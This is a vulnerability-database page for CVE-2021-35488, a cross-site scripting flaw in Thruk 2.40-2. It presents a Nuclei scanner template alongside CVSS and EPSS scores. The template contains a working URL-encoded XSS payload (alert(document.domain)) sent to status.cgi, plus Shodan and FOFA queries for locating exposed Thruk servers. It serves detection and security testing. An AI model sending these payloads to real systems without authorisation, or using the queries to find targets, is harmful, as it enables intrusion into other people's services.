Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-35488
HistoryAug 14, 2022 - 9:31 p.m.

Thruk 2.40-2 - Cross-Site Scripting

2022-08-1421:31:30
ProjectDiscovery
github.com
11
cve2021
thruk
xss
vulnerability
status.cgi

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.5%

Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
id: CVE-2021-35488

info:
  name: Thruk 2.40-2 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://www.gruppotim.it/redteam
    - https://www.thruk.org/changelog.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35488
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35488
    cwe-id: CWE-79
    epss-score: 0.00145
    epss-percentile: 0.50266
    cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thruk
    product: thruk
    shodan-query:
      - http.html:"Thruk"
      - http.html:"thruk"
    fofa-query:
      - body="thruk"
      - title=="thruk monitoring webinterface"
  tags: cve2021,cve,thruk,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "'></script><script>alert(document.domain)</script>"
          - "Thruk Monitoring"
        condition: and

      - type: status
        status:
          - 401
# digest: 4a0a004730450221008d39e5c3676eded54392c719daceba064fa0cde09a56eca387e37596bc2bf058022013e511ae16681f5dcf6cbd938fc2760bcc7ee1a7967746bcd4ff6afaeba72451:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.5%

Related for NUCLEI:CVE-2021-35488